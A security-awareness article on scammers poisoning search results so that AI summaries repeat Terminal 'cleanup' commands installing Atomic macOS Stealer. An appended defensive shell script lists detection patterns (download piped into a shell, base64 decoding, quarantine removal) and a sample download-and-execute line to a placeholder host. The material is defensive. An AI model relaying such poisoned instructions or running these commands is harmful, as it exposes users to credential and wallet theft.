Scammers are finding a new way to leverage artificial intelligence in their operations. Previously, I wrote an article on Scam as a Service and how fraud networks commercialize AI driven tools for abuse. In this new tactic, instead of using AI solely to generate phishing content, scammers are now manipulating search engine optimization so their malicious pages are surfaced, summarized, and repeated by legitimate AI systems themselves. This tactic closely resembles search engine poisoning techniques used by hackers in the early days of the web. Once malicious content ranks highly, it can be absorbed and redistributed by AI tools, dramatically expanding the reach of the scam. Reports of this activity prompted me to take a deep dive into the topic and this is what I found.
𝗧𝗛𝗘 𝗡𝗘𝗪 𝗧𝗛𝗥𝗘𝗔𝗧
Attackers are launching a coordinated campaign targeting Mac users through AI generated answers originating from poisoned search results. Rather than posing as AI directly, scammers focus on corrupting the information pipeline AI systems rely on; after all, AI, at its root, is simply a supercharged search engine with some reasoning ability. By influencing what content is referenced by AI, scammers influence what AI tools summarize and recommend.
𝗠𝗔𝗖 𝗨𝗦𝗘𝗥 𝗧𝗥𝗨𝗦𝗧 𝗔𝗡𝗗 𝗧𝗛𝗘 𝗙𝗔𝗟𝗦𝗘 𝗦𝗘𝗡𝗦𝗘 𝗢𝗙 𝗦𝗘𝗖𝗨𝗥𝗜𝗧𝗬
For years, macOS has been widely perceived as being less susceptible to malware than other operating systems. This reputation was built on a combination of lower market share in earlier decades and stronger default security controls, a perception which influences user behaviour today. Many Mac users assume malware is primarily a Windows problem. This belief reduces suspicion when following online troubleshooting advice and increases the likelihood that users will trust instructions presented as routine system maintenance. Scammers are deliberately exploiting this trust by framing malicious commands as harmless cleanup steps and presenting them through AI generated answers.
𝗦𝗘𝗔𝗥𝗖𝗛 𝗘𝗡𝗚𝗜𝗡𝗘 𝗣𝗢𝗜𝗦𝗢𝗡𝗜𝗡𝗚
Scammers are actively exploiting SEO techniques to inject malicious instructions into search results that are later echoed by AI systems.
This is accomplished through:
- Targeting high intent Mac troubleshooting searches
- Publishing large volumes of keyword optimized technical content
- Mimicking legitimate macOS maintenance guidance
- Leveraging backlinks and compromised sites to inflate authority
These methods mirror black hat SEO tactics once used to poison search engine results with exploit pages and malware links.
𝗛𝗢𝗪 𝗧𝗛𝗘 𝗔𝗧𝗧𝗔𝗖𝗞 𝗪𝗢𝗥𝗞𝗦
Our research indicates this campaign primarily targets Mac users searching for solutions to common system issues such as freeing disk space or removing system files.
The attack typically unfolds as follows:
- A user searches for help with a Mac related problem
- Poisoned pages rank highly due to SEO manipulation
- AI systems summarize or repeat the malicious instructions
- The user is instructed to open macOS Terminal and paste a command
- The command downloads and installs Atomic macOS Stealer
Once executed, the system is compromised.
𝗧𝗛𝗘 𝗠𝗔𝗟𝗪𝗔𝗥𝗘 𝗕𝗘𝗛𝗜𝗡𝗗 𝗧𝗛𝗘 𝗦𝗖𝗔𝗠
Atomic macOS Stealer (AMOS)
Atomic macOS Stealer is a stealthy information stealing malware that operates silently in the background.
It can collect:
- Passwords stored in iCloud Keychain
- Browser cookies and autofill information
- Cryptocurrency wallets including Exodus and MetaMask
- System files and sensitive documents
Harvested data is transmitted to attackers almost immediately.
𝗪𝗛𝗬 𝗧𝗛𝗜𝗦 𝗦𝗖𝗔𝗠 𝗪𝗢𝗥𝗞𝗦
This campaign exploits layered trust rather than technical vulnerabilities. Users trust AI to provide reliable results, particularly when citations and source URLs are provided. Many Mac users also trust their platform is inherently safer. By combining all three assumptions, scammers create a powerful deception leading users to authorize the attack themselves.
𝗛𝗢𝗪 𝗧𝗢 𝗣𝗥𝗢𝗧𝗘𝗖𝗧 𝗬𝗢𝗨𝗥𝗦𝗘𝗟𝗙
Protection against this type of attack begins with changing assumptions, not installing more tools. These scams do not rely on exploiting software flaws; they rely on exploiting trust in search engines, AI generated answers, and long held beliefs about macOS security.
If an instruction requires you to manually run system commands, disable safeguards, or modify core system behaviour, it should be treated as hostile by default. The fact that the guidance appears in a highly ranked search engine result or is repeated by an AI system does not make it safe.
With that mindset in place, the following precautions are essential:
- Treat ALL operating systems, including macOS, as targets, not exceptions
- Do not execute Terminal commands from search results or AI summaries
- Verify technical instructions through official Apple documentation
- Use reputable anti malware software designed for macOS
- If infection is suspected, disconnect from the internet and perform a full system scan
No operating system is immune to social engineering.
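For readers who support other users, the following is an added example (not part of the original article) of a pre-paste check for the "paste this into Terminal" step described above. The function names and the patterns are assumptions: they cover generic download-and-execute and safeguard-disabling idioms, not indicators from this campaign.

```sh
#!/bin/sh
# Added example, not from the article. The patterns are generic
# download-and-execute and safeguard-disabling idioms chosen as assumptions,
# not indicators from any Atomic macOS Stealer sample. Legitimate installers
# use some of them too: a flag means "read what it fetches first".

# _flag TEXT REGEX REASON: print REASON and return 0 when REGEX matches TEXT.
_flag() {
  if printf '%s\n' "$1" | grep -Eiq -- "$2"; then
    printf 'FLAG: %s\n' "$3"
    return 0
  fi
  return 1
}

# check_pasted_command TEXT: return 1 if anything was flagged, 0 if clean.
check_pasted_command() {
  _hits=0
  # curl/wget output piped into sh, bash or zsh (optionally via sudo).
  _flag "$1" '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:]]|$)' \
    'download piped straight into a shell' && _hits=$((_hits + 1))
  # sh -c "$(curl ...)": the download is executed via command substitution.
  _flag "$1" '(ba|z)?sh[[:space:]]+-c[[:space:]].*\$\((curl|wget)' \
    'shell -c executing the output of a download' && _hits=$((_hits + 1))
  # Encoded payloads hide what will actually run.
  _flag "$1" 'base64[[:space:]]+(-d|--decode)' \
    'base64-decoded content' && _hits=$((_hits + 1))
  # Stripping the quarantine attribute or disabling Gatekeeper assessment.
  _flag "$1" 'xattr[[:space:]].*com\.apple\.quarantine|spctl[[:space:]]+--master-disable' \
    'macOS download safeguards being removed' && _hits=$((_hits + 1))
  [ "$_hits" -eq 0 ]
}

# Constructed samples (example.invalid never resolves); nothing is executed,
# the strings are only matched against the patterns above.
for sample in \
  'curl -fsSL https://example.invalid/cleanup.sh | bash' \
  'curl -fsSL https://example.invalid/tool.dmg | shasum -a 256' \
  'du -sh ~/Library/Caches'
do
  if check_pasted_command "$sample" >/dev/null; then verdict=clean; else verdict=REVIEW; fi
  printf '%-7s %s\n' "$verdict" "$sample"
done
```

On macOS the clipboard can be checked before pasting with `check_pasted_command "$(pbpaste)"`. A clean result only means none of these idioms matched; it does not make an unfamiliar command safe.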
𝗛𝗘𝗟𝗣 𝗨𝗦 𝗪𝗔𝗥𝗡 𝗢𝗧𝗛𝗘𝗥𝗦
If you encounter AI generated advice or search results instructing users to run system commands, report the source pages to the platform. Share this alert with others, in particular macOS users.